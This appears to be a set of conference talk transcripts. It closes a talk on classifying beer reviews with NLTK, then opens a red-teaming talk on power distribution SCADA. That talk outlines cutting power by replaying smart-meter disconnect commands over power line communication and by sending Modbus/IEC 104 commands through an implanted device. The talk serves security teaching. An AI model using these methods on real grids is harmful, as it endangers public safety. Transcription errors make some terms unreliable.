parse item. Where it actually goes and grabs the document and uses a library called readability to try to filter out the main part of the web page, which is the actual content. So that's a way with the header and footer and things like that and stores those files. So go here, run the spider and take sort of a half an hour's break to just like this filter or crawl the entire internet on the conference Wi-Fi. Luckily I've done this before, so we don't need to keep this thing running. It's going to keep on for a while. There's quite a lot of information out there. What we have after running this is that we have a huge set of web pages. And we do have some of them in here in the data folder. So just go ahead and open one of these in the browser. Just go to the full browser. So it looks like this. 
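The spider code itself goes by quickly in the talk, so here is a minimal sketch of that kind of Scrapy spider, using the readability-lxml package to boil each page down to its main content. The domain, start URL, output directory and file-naming scheme are made up for illustration, and the readability API is quoted from memory:

```python
import hashlib
import scrapy
from scrapy.linkextractors import LinkExtractor
from scrapy.spiders import CrawlSpider, Rule
from readability import Document   # pip install readability-lxml

class BeerBlogSpider(CrawlSpider):
    name = "beerblogs"
    allowed_domains = ["example-beer-blog.com"]        # made-up domain
    start_urls = ["http://example-beer-blog.com/"]
    rules = (Rule(LinkExtractor(), callback="parse_item", follow=True),)

    def parse_item(self, response):
        # readability strips headers, footers and navigation, keeping the article body
        doc = Document(response.text)
        filename = hashlib.md5(response.url.encode()).hexdigest() + ".html"
        with open("data/" + filename, "w", encoding="utf-8") as f:  # assumes data/ exists
            f.write(doc.summary())
        self.logger.info("saved %s (%s)", filename, doc.short_title())
```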
So you have someone writing about their favorite peers. Well, nice. So it's basically the same thing as you have here. And we have thousands upon thousands of these. So what I find interesting is how do we extract information from that? And when you get to like real world information like this, I find that the naive bias approach seldom is the best one. So we're going to go back to MLTK and I'm going to just take a little pause and talk about this little beer label that we got here. This is an actual beer. You probably are familiar with this looking at fonts because this little sentence has all the letters in the alphabet in it. But it's also something different. It's one of the most famous trigrams that are out there. And trigrams are combinations of three. And in this sense, it's the different combinations of three words that are in present in the sentence, the quick brown fox jumps over the lazy dog. And those are probably supposed to be the quick red fox, isn't it? So they left that out of design reasons for under label. It's still a cute beer label, though. So you would have something like the quick red one trigram, quick red fox, another one, red fox jumps, and so forth. And these things are really useful for getting features out of the text. And we're going to work a bit with trigrams now to see how we can classify different sentences in these reviews. So we're going to head back into our Python code. And we have this thing here. And this is also good reason for using Python for this because you can write, like, straightforward code. So what we do is that we open a file that contains all a list of all the web pages that we have crawled. So to go through each review page that we have, and we open the HTML file, just print the title, get the HTML content, grab a bunch of sentences from that by just getting the text from the HTML document, tokenizing those using a sentence tokenize function in MLTK, which will be similar to what we saw with word tokenize earlier. But what MLTK will do is that it will retain sentences and no sentence structures. So it's going to be quite clean. And then just go through each of those sentences and extract the features. And the extract feature function that we have up here is really something that uses a different kind of word tokenizer that has more knowledge of the language than the one we used earlier. And it's going to go out, tokenize, sentence into different words. Then we're going to go and part of speech tag this, as we did in the earlier example. And then we're going to get information on what word classes the different words are, if they're announced, if they are verbs and so forth. And then just tag, simplify the tags just to make it easier to keep them with the diagrams. And then just go through this and create the different combinations and have the word classes in there as well. So as it does this, it's going to ask us what the different features are. So if I bring this thing up here, we get a blog post called by the Gloss show, Hollywood Organic Brewing Company. And we get the different sentences. And I'm going to know that this is something generic babble, which is there is lots of in these. So we talk a lot. I'm going to say that this is other. And he talks a lot. He's very talkative, this guy. And suddenly we get down to a description of the beer he's drinking. And this is, so let's just tag that by saying, D, this is a description. Everyone loved it. That's kind of a review, isn't it? This is an opinion. 
So let's say that that is a review. And so forth. Let's go on like this. This is really the hard, long and boring part of working with this. It's training classifiers and it's a difficult job. Luckily for you, I've done this before. Based on this, we're going to have, and let's just bring up this, we're going to have lots of data. So sublime, I'm just going to bring up an editor. So classification training. It doesn't really matter. I'm just going to open a file. It's called classification training JSON. There's a video later if you don't believe me. So we're going to increase the font size here and I'm just going to format this. Like so. So this is a huge set of data that has been tagged and classified into different sentence styles. So here we can see the diagrams that appeared in the sentence. The true thing is just here to create a hash. So what we have here is sort of a large set of different observations. And when we saw this, we found this to be some generic information that's not really of interest to us. We are after the descriptions of the beers and the reviews which are in there. So we want to pull out that information from the web pages to use that in a structured way and try to use that as data for our application. So this is basically what is happening behind the scenes here. Now, so this fall we only have diagrams of the words which are very similar to the features we had for our Bayer's thing. So this time around, I told you we were not going to be using Bayer's. We're going to use something called maximum entropy or max and which is often preferable over Bayer's when you have data that is not very similar. And with text, you have all sorts of different variations. So this is probably going to perform better in those scenarios. But it's a much more heavy algorithm than Bayer's thing. So this is going to take quite a lot of computational power and we'll see that just in a second as I show you how you can use NLTK to actually create a... or classifiers for this. And this is really easy. Since we already have a structured file with data, this is the JSON file we just saw with all the diagrams in them and classifications, we can just go ahead and open that file and just create a maximum entropy classifier and train that on that dataset. The exact same address we did with Bayer's data earlier. And this is going to take some time and I'm going to show you that by running this. So it's going to ask us if we want to create this. Oops. So it starts off and it's going to work its way through 100 iterations here, which as you can see is going to take some time. So these things take time to build. So a trick that is very nice to know is that you can use the pickle serialization library in Python to really when you have that class already trained, you can just dump it and you can reload it later. And lucky for you have done this before as well. So let's head on over to the not the brewmaster but the beer critic. And look at how we can use this to classify different information that is in found in these web pages that we have looked through. So we're going to create two classifiers. One is a sentence classifier, which is what we train to know what the different sentences in our documents are. So this classifier is going to help us find out whether it's a description of a beer or if it's a review of a beer or if it's something totally irrelevant to us. 
While the other one is a sentiment classifier that is going to help us with determining whether the review is positive, negative or neutral. And very often I see people using this to determine as we did with the bias example at the beginning to determine either if something is positive or negative. And I think it's very, very important to also have that neutral class in there because when working with these things, nothing is really set in stone. There are lots of gray areas in between and you need some bag to put that in as well. So you need that neutral, even if you're just interested in positives or negatives, you want to put something that say I don't know. And that's another thing about this is that we just saw that it takes time to actually build the classifiers, but it takes tons of time to train them. And as we're using them here, we're using them in a rather naive manner and we're going to see that in play quite soon. So this is very similar to what we did when we trained these things. So we just grabbed a list of review pages that we have and go through each of them and then just open it, grab the sentences and iterate through each sentence and extract the features. But instead of telling it what the feature was, we ask it to tell us what it thinks this is. So we do that just as we did with Bayez earlier, use the sentence classifier and ask it to classify based on the features that we have. Now, it's very important that the features we use here are the same style of features that we use when we train this. And then just print it out. If it's a review, just keep that around and classify the review as well. And finally, make an assumption of whether this is a positive, negative or neutral review based on how many positives or negatives or neutrals we've seen throughout. We need to run the right file, sorry about that. So we're going to run bare critic. So it starts off with Sam Adams Imperial White and probably pulled this up a bit. It goes through, tells us that these things are other sentences. This is a description. Yeah, it actually is. It says something about redesign of the label. So forth makes a couple of mistakes says that this is a review. It probably isn't. So forth, but review, it's really quite nice. They're really good too. This to me just skimming through this, it sounds rather positive and this thing agrees. It says it's positive and if I'm for positive instances in here, we can go on. This if I'm to positive instances. This is probably going to be a bit biased towards positive reviews right now. It looks right here. It didn't find anything. It only found found descriptions, which is ghostface killer. I guess that's by the hip hop artist ghostface killer. No, it's not. And this is where it comes into the picture, the importance of training these things properly. Because the way we've been using them now is that we have trained them just telling it that this is positive, this is negative and so forth. And it's going to place weights on that and it's going to do its best trying to look for patterns of words appearing together in different sentences. And looking at, I've seen something similar to this before. In that case, this was a positive review or this was a description. And since this is natural language, things are going to differ quite a lot based on the writers different styles and so forth. Which is something that the computer has a really hard time understanding. When we read this, we have quite a good lots of experience and we are pretty smart. 
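As an aside, the train-once, pickle, reload pattern described above looks roughly like this. MaxentClassifier is NLTK's maximum-entropy implementation; the tiny stand-in training data, file name and iteration count are invented for the sketch, not taken from the talk:

```python
import pickle
import nltk

# A tiny stand-in for the real trigram-based training data described above.
labeled_features = [
    ({"contains(hoppy golden ale)": True}, "description"),
    ({"contains(loved every sip)": True}, "review"),
    ({"contains(went to the)": True}, "other"),
]

# The slow step, worth doing only once.
sentence_classifier = nltk.classify.MaxentClassifier.train(labeled_features, max_iter=25)

with open("sentence_classifier.pickle", "wb") as f:
    pickle.dump(sentence_classifier, f)      # dump the trained model...

with open("sentence_classifier.pickle", "rb") as f:
    sentence_classifier = pickle.load(f)     # ...and reload it instantly later

print(sentence_classifier.classify({"contains(hoppy golden ale)": True}))
```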
So we detect things like irony. Hopefully we detect things like irony in there. Computer does not. So one of the things that you need to do whenever you do a practical application of this is that you need to work a bit on the text as well. You need to help the computer along. So one of the things that you probably would find yourself doing is that you would maintain a dictionary of phrases that you know to be extremely positive and increase the weights of positive whenever those are there, similar for negative and so forth. To basically cheat a little and help this be more precise. But we're not doing this today since we're just showing the sort of simple features of this. And it's basically a good idea to drink beer to get those big ideas. And this is a good opportunity to play around. Because as I said, for those of you who can't live without the safety net of test driven development and having control of everything, this might not be for you because this is a living thing. Sort of like the yeast that goes into this. There is a brewery in Kansas that I'm very fond of which makes a series of brews that are called Love Childs. They're all strictly one offs because they can only make them once. And those are wild yeast brews. So what they do is that they have a batch of barley on whatever they put out there and let it absorb microbes from the air and start a yeast or the brewing process from that. So you get a total random results. Sometimes it's good, sometimes it fails totally. And it's a bit similar to what we do with this. Since the algorithms are only going to know the information they have been trained on, and when we go out and grab things from blogs of the internet, it's going to be totally random and it's going to be biased to the mood right it was in at that day. I've seen things in these blog posts where the author is really pissed off about something, but whereas a really good review of one of his favorite beers and you're going to have something that sort of swings both ways in there, it's going to be hard to determine just looking for positive words and negative words and so forth. So if you go down this route and try to play around with this, you're going to have to expect to find yourself experimenting quite a lot to hit that little sweet spot. But most of the techniques you see in today's from a little pet project I have that I've been working on for years, and the scenario said I'm doing there are very similar to what we're doing here. I'm extracting information and turning it into something structured. And all that comes from blog posts which are written by tons of different people, tons of different writing styles, even different dialects they've written and so forth. And whenever I've been working on that, I've been spending most of my time just tweaking these little things all back and forth. So don't expect something like this to be easy even if it looks really easy to work with libraries and so forth. And expect to fail quite a few times before you get this thing behaving sort of like an intelligent thing. So since I was the only thing standing between you and what's ever down there, I just want to thank you guys for showing up. I hope I've inspired some of you to try and play around with a domain of computer science that most of us never see or never touch. This can actually be useful for quite a few things, even within the enterprise domain where everything is databases and so forth. Netflix uses this all the time, but all the big boys use this. 
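The lexicon trick just mentioned, nudging the result whenever a phrase you already trust shows up, can be as simple as the sketch below. The phrase lists are invented examples, not a real lexicon, and the function simply overrides the classifier's label when a trusted phrase is present:

```python
STRONG_POSITIVE = {"world class", "perfectly balanced", "sublime"}   # invented seed phrases
STRONG_NEGATIVE = {"drain pour", "skunked", "undrinkable"}

def adjusted_sentiment(text, classifier_label):
    """Override the classifier only when a trusted phrase appears in the text."""
    lowered = text.lower()
    score = sum(p in lowered for p in STRONG_POSITIVE) \
          - sum(n in lowered for n in STRONG_NEGATIVE)
    if score > 0:
        return "positive"
    if score < 0:
        return "negative"
    return classifier_label   # otherwise trust the trained classifier

print(adjusted_sentiment("A sublime, perfectly balanced IPA.", "neutral"))  # positive
```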
Facebook uses this a lot. So there are lots of applications for this. I've used it many times if you're wondering about what I've used it for. Come speak to me later. So I don't know if you guys have any questions. Yeah, you do. Similar to linear program. Yeah, it's sort of it's if you're thinking about style, I'm writing the code in. In terms of building up training set and applying it to random data. Yeah, which is basically what you do here as well. So it's sort of a super set of that because you're working within a very specific domain. Yeah. So any other questions? No. Okay. Gonna let you go earlier than you can run them down. There was a big queue for this. So I'm not sure if there's anything left, but go down to the back guys because this thing is awesome. So thank you all for showing up and have a nice party. Katzen Jammer is a really good band. Thank you. Thank you.
|
In this talk Anders Norås will teach you how to use computational linguistics to make sense of and extract data from unstructured human-language texts. The session is structured as a step-by-step, progressive walkthrough where we build a small application which uses computational linguistics and machine learning to determine whether a product review is positive or negative. We'll be using Python for the programming examples, but knowing Python is not a prerequisite for attendees.
|
10.5446/50777 (DOI)
|
Thank you. Hello everyone, this is Jan from Istanbul, Turkey and I am at Sarkand today and we will be talking about playing with electricity and red teaming in power distribution companies or hacking in the power distribution companies. Before getting started, I would like to thank the ICS Village team having us. It's really great opportunity to meet you all. We really like to be part of the community activities all over the world. We also some community activities in Turkey as well. So it's really great to be meeting you all over here. Basically, we have one hour with you and basically we have three parts of presentation. The first part is overview. We will make a brief information, give a brief information about the electricity architecture and power distribution company architecture and give you some scale application architecture on it. And then we will discuss red teaming scenarios and then we will perform some attacks on our simulation lab. Actually, thanks to Sarkand, our simulation lab had some nerve issues. We changed our hardware like four times last three days. But it worked at the end of today and we did videos for this presentation to await any problems. So we will have some videos and we will talk about it. All right, so let's do it. Sarkand, please go ahead and introduce yourself please. Thank you, Jan. First of all, good afternoon for American site spectator and maybe good night or good evening for the European and Asian sites spectator. First of all, I'd like to thank you for giving us opportunity in this beautiful organization and I'd like to express my pleasure being there. Now I will give information about myself. I am Sarkand Tamal. I am an electrical and electronic engineer. I have seven years experience about industrial control systems, systems based on electric distribution, transmission and power generation. For last one year of the my career, I'm focused on the cybersecurity and systems and also focused on the industrial control system, cybersecurity topics. Thank you, Jan. We can go on now presentation. I am also an electronic engineer and I have more than 80 years cybersecurity background and last five years I mostly concentrated on critical infrastructure and I say SCADA cybersecurity. At the moment, we both working for cyber-wise for critical infrastructure cybersecurity at the moment and today, as we mentioned, we will discuss electricity sub-sector and power distribution, red teaming and cybersecurity. All right. We want to start with why electricity matters actually. It's not just for us but for all the rest of the world. It's the backbone of all critical infrastructure. When it fails, it direct effects the data life or modern life fundamentals. For example, it affects health sector, transport sector, transportation and finance sector and so on. Once it fails, it directly affects people and public safety and it's really backbone of the critical infrastructure. We want to take dead parts and we wanted to build a presentation to point. We will be discussing about red teaming in power distribution companies but before it, we need to understand the electricity architecture in process-wise. Basically, it has three parts. We have power generation, we have transmission lines and then we have a power distribution part. Most of the time, power plants and power generation located in the out of the city centers. That means we need to carry electricity long way of kilometers. 
It means we require the transmission lines and finally, that means we need to power up-down operations. Once we are over from the transmission lines, we came up with the power distribution. Actually, it is the last line of the customer touch. I mean, if something fails in power distribution part, it directly affects customer and our business. To be honest, the distribution companies and electricity distribution process is not too much complicated when we compare the power plants or petrochemical industry. It is easy to attack and also it is the defense. Serkan, would you like to add something? At some point in that presentation, today we tell you the distribution, but I would like to be aware of the point. The transmission layer is a critical part of the electricity architecture because it is a bridge between power generation and power distribution. This is the backbone of the electricity architecture. Today's topics are distribution electricity, but transmission is very critical in the cybersecurity perspective. And actually, it depends over the countries or over the regions. Sometimes it is operated by the government. Sometimes it is operated by private companies. It really depends on the region and countries perspective. But I really agree with you that transmission lines are also the core of the electricity architecture. Thank you. So let's dive into the power or electricity distribution infrastructure. First of all, it's a really great example of the SCADA because you have people, which means the supervisory element of the SCADA, and you have remote locations. As you can see on the screen, there are lots of different substations connected via different types of communication media to your control center or emergency control center. So what we said, it's a great example of the SCADA application because you get data from all over the different remote located substations, and sometimes you control over the remote substations. So on the other hand, you have remote offices like payment offices, headquarters, government agencies to report for, or you have direct integration. For example, in Turkey, Renewables Power Plans has to report the nearest power distribution company for the regulation. Basically, what we can say, there are lots of remote locations we have that we need to control, and that means we need different types of communication media. In distribution companies, we really need to take care of the communication media security as a part of the defense mechanism. On the other hand, sometimes some companies or some governments or some countries has smart meter application, which means smart meters has direct effected electricity. They open and close the electricity via metering control center through the smart meters. Why I'm telling you this? Because it will affect our red team scenarios and understanding the infrastructure. What we need to understand from this slide, we need the loss of high level of connectivity. There are different types of communication media, and we have lots of different type of substitution and equipments. And the rest of it, we have lots of different type of integration. All right, I'm gone. All right, I will give a brief information and pass to Sarcan's stage. We discuss about the electricity architecture, and then we discuss about the power distribution architecture. Now, we will discuss about the SCADA architecture. It's also distributed in the server side. 
But before jumping into it, we need to understand there's a need of high level of connectivity in such a power distribution company. Sometimes we need to connect the outreach management system, ERP application, call center, and so on. Maybe Sarcan give some example about that. Yes, we mentioned about the previous presentation that we said that distribution, like the distribution, touch the customers. So this means that the distribution company, so many customers works into like customers management, outreach management, VFMs, other stuff, so many stuff for the customers. The reason of that, the distribution SCADA systems must be and have to be integrated IT software applications, like John mentioned, that's OMS. OMS, like VFM, like the other companies, third-party software. Because of that, distribution SCADA systems, LW difference from the transmission and power generation SCADA systems. And also in the distribution network, so many substations. This means that so many data, so many connection stations. So we need the power rule SCADA systems. We have to separate this load to separate servers, like application server, like communication server, like data server, like backup server, and so on, like HMI server. So distribution SCADA systems a little bit distributed and separated structure. It's very similar to IT environment, actually. You have some type of application servers, communication servers. It do some kind of load balancing, and it requires really great integration of IT application or business application. Sometimes it's part of SCADA applications, like the called outreach management system or call centers. They are directly talking or integrating with the RSCADA application. Because once you have a kind of blackout or shutdown electricity, you will get some calls. You need to reach out to customers. You need to get some data from SCADA. So it's really integrated with IT applications, sometimes cloud applications. And on the other hand, you have entrusted parties, like vendors, remote offices, other type of control centers or government agencies. So sometimes it's done via the firewall, sometimes directly connected to your industrial equipments. It really depends on the customer strategy, or sometimes they are not really aware of what kind of communication channels they have. But what we need to remember through here is that RSCADA architecture is distributed as a server roles, and it's like an IT application and it has integration with the business side. And also it talks to the substation through our communication media. So I will leave the comments to Sarkam about substation because he's expertise lots of years. Now we have talked about the substation architecture. The substation architecture is distribution substation process. We have some main devices for the process we use. The first one is RETU. RETU is a telecontroller which connects field devices to SCADA systems. We think as a data concentrator or data transfer devices RETU. Energizer is an energy meter which gets information from the CT and VT transformer from electric sites information and translates in the digital sites and give and directly send this information to SCADA systems. Protection relay, it is a critical equipment in the distribution and also transmission and also generation as you know that. Protection relay is the first IED device, first electronic device connected physical electric system. It is a bridge cyber and physical world. 
For that reason, the protection relay is the most critical part and the most critical device in the distribution system. From a cybersecurity perspective, if you want to shut down the electricity you have to control the protection relay. Maybe you can attack the RTU, maybe you can attack the SCADA system, but that just blocks our monitoring of the field side; if you want to control the electricity, shut it down or re-energize it, you have to control the protection relay. The fourth device is the smart meter. The smart meter, as you know, is for billing purposes, and on the low-voltage customer side it can shut down or re-energize the electricity. The last two devices are physical devices. The first one is the low-voltage circuit breaker, which controls an electricity line, and the last one is the medium-voltage switchgear (the circuit breaker also sits inside it), which controls the electricity lines of the network. Next slide please. I think, yeah, yes. So we had the IED, the protection relay device. I would like to say this again because it is very critical. A protection relay has two parts: one is the hardware, the other is the software. On the hardware side they have analog inputs, analog outputs, digital inputs, digital outputs, and also serial and Ethernet interfaces. Voltage and current information comes in through the analog input modules, and to control analog values, set points such as power, frequency or voltage, you have to send them through the analog outputs. The digital inputs are the most critical, because the digital inputs basically come from the circuit breaker position, the isolator position and other information about the physical system, and the digital outputs control the circuit breakers, which means they control the electricity. Because of that, in SCADA systems, in most of the communication protocols and from a cybersecurity perspective, we focus on the digital output signals. In the beginning these devices had serial interfaces, because at that time the Ethernet and IP world was less widespread; today most devices have an Ethernet interface, which brings the advantages of the Ethernet and IP world, but it also causes side effects from a cybersecurity point of view, and I will talk about these later. On the software side there are the communication protocols, meaning industrial communication protocols like Modbus, Profibus, IEC 104, DNP3 and others, which help the device communicate with the RTU or with the SCADA system to send information to the upper level. Logic functions control things like the circuit breaker and other blocking functions. And there is the configuration interface; this is a critical part of the IED. As I mentioned, they have an Ethernet interface, and most IED devices nowadays use a web-based interface for configuration, and this is one of the vulnerabilities of these systems and a big point about IED devices today. Thank you, Serkan.
Actually we always get afraid or get freaked about touch such intelligent electronic devices because as you mentioned one part is physical that controls electricity and one part is cyber it's R2 or SCADA applications and it's like a last line of the physical and cyber breach once you control it you control the electricity you can control it through the R2 or you can directly send commands to the IID or you can trigger some SCADA application set points and it will directly affect the intelligent electronic devices but once you're planning a red teaming or pan testing activity you need to be aware of such a devices can affect the electricity and you need to be really careful what you are playing with. All right so now we can discuss about red teaming approach and red teaming scenarios. Before jumping into the details I wanted to discuss how much red is that because since it's a critical infrastructure since it's a last line of the custom touch can we be really free to be really red teaming in that case the most of the asset owners and most of the cyber security companies get afraid to avoid the consequences of that thing happens. So I may say that nobody does directly red teaming maybe it's like light pink teaming let's say because we really need to be aware of that the public safety and process safety is much more important than your color activity so you really need to take care of the process you really take care of the public safety because we always think in a that way if we shut down electricity for the hospital and if we kill someone in that hospital because of no electricity so it really has a great boundary for us to do our tests or pan testing activities or red teaming activities in a controlled way so it's not really red light pink maybe but to understand each other in a better way I want to express that part as well so I would like to mention about the core steps we divided into five main steps actually we discussed about the first two of them to understand the process understand the architecture once you do any red teaming activity in any kind of ICS infrastructure in that case we are talking about the power distribution we gave brief information about the electricity architecture distribution architecture skate architecture and substation architecture and we thought that power distribution companies process is not too much complicated we have very limited type of signals compared to power plants and petrochemicals so it's a really easy process to ease the attack and use the defense now we need to define our landscape and then we will try to create some kind of scenarios to directly develop for direct teaming activity usage and then finally we will perform some kind of attacks in our simulation lab I don't want to talk about the IT based or getting into the IT and then jumping into OT kind of red teaming activities or landscape but once you are talking about the power distribution red teaming we wanted to give you brief landscape information that what you need to know what you are going to face and how it will affect your planning so basically we have eight categories that we will discuss today the first one is protocols there are different types of protocols you will see in the field in the distribution companies basically in skater parts I mean the wide area network you will see ISC 104 and TMP3 and substation level you will see different types of protocols sometimes schools MMS and so on and upper level and supervisor level you will see soft pass and the control level you 
will see mobus tcpr2 even sometimes serif protocol and then if you have smart meters and even in skater application you may have the power line communication it's not it's still plc but it's different term we will discuss it today as well and then we said that communication media is very important if you get into the communication media somehow let's say you get into the apn network based on gsm or you get into the RF signals and you then directly interact with substations interact with R2s and interact with control center equipments and emergency control center equipments so communication media is also too much important for us to uh rectify planning on the other hand you need to be aware of the third part integration there are different types of integration it depends on the country and region and the regulation you see some of them in our list and also as a set owner you have some kind of remote locations or local locations like control center, energy control center, material control center, headquarter, payment offices or communication center for like RF towers so asset owner locations also matters to us on the other hand substation is very important for us because it is remote located and physical and cyber control is very limited compared to control center or emergency control center or headquarter in that case you will be facing with industry protocols on institutional devices and you may apply some kind of hopping attacks what I mean by that you once you get into the specific remote substation you can jump over the other substation you can jump over the control center or emergency control center you may create some tag signals it's like coming from the old remote substation and so on so it's very great and point and great defense point for us and but I should stress out that in substation we have some physical controls for example if someone opens the door or if someone opens the cabinet if someone moving in the substation it creates some alerts and sends signals over the one or four of the control center so we still have some type of controls that we need to be aware of when we plan associate activities or when we plan red teaming activities on the other hand technology I'm sure that all the villagers have a proper knowledge of them I don't want to express each of them because it's like the IT wise pan testing or red teaming because it's server network devices and some kind of field devices so I don't want to go each of them and on the other hand we have people for example in Turkey we have a specific regulation for assessment in the power generation and distribution companies and it requires social engineering activities for the energy people let's say the asset owner people sometimes we see that some red teaming activities hit the vendor engineers or OT partner engineering company engineers so and people's segment is also really a very and different types of mechanisms they have for example in Turkey we need to do physical pan testing we need to do phone calling we need to do email based social engineering all right and done by the regulation and also yet another landscape for us the industrial process and we will discuss it yet in another conference because since it is the less signals and it's less complicated in the power distribution and power industry the industrial process vulnerabilities may affect public safety directly so we avoid to mention the entry points of process vulnerabilities but we can discuss it later in for another industries on the following days all right 
so I hope we understood the process we understood the architecture and defined some kind of landscape again it may change the region country and regulation but we need to understand the basics of distribution so we need to create some kind of scenarios in this presentation we created three types of scenario we have created a specific table for that I will discuss it through them and it's again not IT based red teaming or pan testing we try to create some kind of directly effect on electricity based scenarios so in the scenario we have a chance to work with our IoT team leader and hardware security leader with Fatih Khairan actually he developed this scenario and applied in the field once upon a time we were in the distribution company and came up the idea that we figured out somehow the smart meters were controlling the city's electricity which means if we could find a way to send a proper comment smart meters it will directly shut down the electricity in that case the dead smart meters were talking through the power line communication and so we created our scenario based on this so to understand the team mates to each other in a better way we create such a table to define our success criterias difficulty factors and decide if the chain is required or not I will go through the one table and I will pass through the rest of the it because we will perform a real-time simulation for the rest of it in this scenario we targeted the shutdown electricity but before jumping into that we classified our tactic and techniques based on my tree manipulation of control and manipulation of weave and our entry points was smart meters power line communication complexity in this scenario was high difficulty was high because unknown protocols were there specific hardware design is required and high voltage work environment is can be dangerous because we lost one of our laptop and one of our team member got injured during this test because we work with the high voltage directly with the plugs and to better understanding you plug the smart meter into the city network so you turn into that specific smart meter into weepen to target the electricity for better understanding I will discuss it through this presentation so dependency was the communication interface reverse engineering or protocol reverse engineering required time was high for us and also what was our success criterias understanding protocol send and receive packets on the power line send command cutoff the electricity for a defined area sometimes we create some so c success criteria for our customers to detect better the next attacks in that case it could be hardware or smart meter log management oms log management core center log management or smart meter replication log management could be a success criteria in that case we defined log sources for redeeming activities and then we define a purpose method and a kill chain activity in that case our purpose was shut down the electricity via unexpected point of entry through unexpected communication media turn plug and matters into industrial attack equipment so our idea was simple so power line communication works through the power signals you modulate it and put your data into the electricity signals so it directly talks through the electricity in I think there yesterday there was a specific session about that in that case we will look into the how it's used in distribution companies in that case we have the power concentrator which is directly connected to different types of customers almost 
and there are smart meters and power line communication interfaces, and the concentrator connects to the backend system through the APN, over the internet. And guess what — the messages going over a specific power line are broadcast. If you have the right hardware — you can develop it, or you can turn a smart meter into your own tool, which is what we did — you can understand the meter-reading data and the shut-down-the-electricity commands. Since it is broadcast, every smart meter receives the data; once you give an order every meter sees it, but only the addressed one applies it and reports back to the center, so once you sniff the data you can see the smart meter ID. On this power line communication the DLMS/COSEM protocol was being used, and a specific value defines the shut-down-the-electricity command — very similar to a double command in IEC 104 — and we were also able to get the readout data; this is the readout code for DLMS/COSEM. What we are trying to say is that you don't have to attack the SCADA application, the RTUs or the IEDs directly: the best and easiest way is to find another proper line to the end of your goal. In this case the power line communication and the smart meters gave us a chance to shut down the electricity, but you need to deal with high-voltage electricity, with power line communication, with new types of protocols, with modulation, demodulation and encryption-type things, which requires much more time. Most of the time the asset owners and the pentesters don't pay attention to that channel, so you really create value for your customer and for people's safety. As far as I know, European countries also have large smart meter deployments, so we need to take care of these standards as well. Okay, so our last two scenarios are based on RTUs and industrial protocols, and we will show how to do industrial red teaming in a real lab environment — which took Serkan days to get it all working for these sessions. Basically we have two different scenarios left for this presentation. One of them is extracting data from configuration files, without any further reverse engineering or implementation of anything: think about it — you have some configuration files, you don't have any access to the OT environment or the substation yet, but you can still figure out enough data to plan your next phase of red teaming activities. We have a specific example of that; since I discussed the previous table deeply and in detail, I don't want to lose time on this one, so I will jump to the next. The other scenario for this session is the remote substation protocol attack: the attacker needs to interact with the substation equipment — it can be done via a Raspberry Pi implant connected over Wi-Fi and so on, like we did in our lab environment — and we will shut down the electricity using protocol commands. Once we understand what kind of protocols are used and how, we will figure out where to send the data, and finally send the data that shuts down the electricity. To make sure we understand each other: if you are planning a red teaming activity or an assessment in a power distribution company, you need to understand the process, you need to understand the architecture, and you need to understand the landscape. Once you have those three elements, you can create your scenarios. You need to think outside the box, but that box does not mean you
can step outside public safety rules or process safety rules. It is really hard to balance, and we want to give you some simple ideas for reaching your end goal rather than implementing IT-based or IT-related red teaming activities. I think I can be free from now on and put Serkan into the fire. As is tradition we came face to face with Murphy's law, but we finally succeeded in setting up the lab, so now I can give you information about the lab setup. It is a very simple slice of a substation process: we have one RTU (an ABB RTU500-series unit), one IED device, one SCADA server with the SCADA PCs, and one switch. We use Kepware's KEPServer software as the SCADA master, and we use the Modbus TCP and IEC 60870-5-104 protocols: Modbus TCP is used on the line between the IED device and the RTU, and IEC 104 between the RTU and the SCADA/KEPServer machine. The tricky part is the hardware-implemented substation itself; as the attacker we assume we have a Raspberry Pi or a similar device as the attack machine. Before jumping into the details I would like to mention that this setup does not indicate any vulnerability in ABB RTUs — it is just a simple RTU that we could get on the market and that we know how to configure. We will do some protocol-based simulation, but it doesn't target ABB specifically: we are actually leveraging how the protocols are used, to avoid any misunderstanding. The second reason we chose this RTU is that it is very commonly used in European and Asian sites. Now we can jump into the lab videos. We will start with interfaces and signals. The first video is about configuring the RTU; we use the RTUtil 500 software for programming and configuration. We created the project beforehand and open the existing project — this part takes a little time and may be boring; I hid the project file deep inside my file system — and yes, a Turkish character error. This is the RTUtil 500 software interface. In the network tree we have the communication lines: one is IEC 104 for SCADA communication, the other is Modbus TCP for the IED's Modbus communication line. You can easily see the parameters of the IEC 104 communication protocol setup — the ASDU address, the ASDU structure, the information object structure, the maximum APDU length — and then the Modbus TCP side of the configuration; that is the network tree. In the hardware tree we choose our RTU main CPU module and add the field-level signal information; on the hardware side you also see the Modbus communication configuration zone — this is the IP address of the IED device — and again the IEC 104 configuration section. Then the RTU interfaces: it has two Ethernet interfaces, and you can see the IP addresses of the interfaces. On this screen we configured our field-level signals, for example active power: on the Modbus side it is holding register index number 13, and on the SCADA IEC 104 side it is ASDU address 1, information object address 103. The other signals, like phase A current and phase B current, we recorded with all their parameters, in case you want to go online later or replay this in your own lab; once you understand this configuration part, the rest of the simulation is much easier to follow. These are the types of Modbus signals: coils and statuses used for information; single point information and digital inputs such as the position of the circuit breaker and switches; controls, meaning the control command sent to the circuit breaker and the power limit set points; and the other metering information — phase A current, phase B current, phase C current.
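To make the Modbus side of that mapping concrete, here is a minimal sketch that reads the active-power holding register straight over a raw socket, so the frame layout stays visible. It is an illustration under assumptions: the IP address, port and unit ID are placeholders (the talk does not give them), and register 13 is simply the lab value mentioned above.

```python
import socket
import struct

IED_IP      = "192.168.2.10"   # placeholder - the talk does not give the Modbus device address
MODBUS_PORT = 502              # default Modbus TCP port
UNIT_ID     = 1                # placeholder unit (slave) id
REGISTER    = 13               # holding register used for active power in this lab setup

def read_holding_registers(ip, start, count, unit=1, port=502):
    """One Modbus TCP 'Read Holding Registers' (function 0x03) request over a raw socket."""
    pdu  = struct.pack(">BHH", 0x03, start, count)         # function code, start address, quantity
    mbap = struct.pack(">HHHB", 1, 0, len(pdu) + 1, unit)  # transaction id, protocol id, length, unit id
    with socket.create_connection((ip, port), timeout=3) as s:
        s.sendall(mbap + pdu)
        resp = s.recv(256)
    # response: 7-byte MBAP header, function code, byte count, then big-endian 16-bit register values
    byte_count = resp[8]
    return [struct.unpack(">H", resp[9 + i:11 + i])[0] for i in range(0, byte_count, 2)]

# Note: some stacks treat "register 13" as address 13, others as 12 (off-by-one register numbering).
print("active power register:", read_holding_registers(IED_IP, REGISTER, 1, UNIT_ID, MODBUS_PORT))
```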
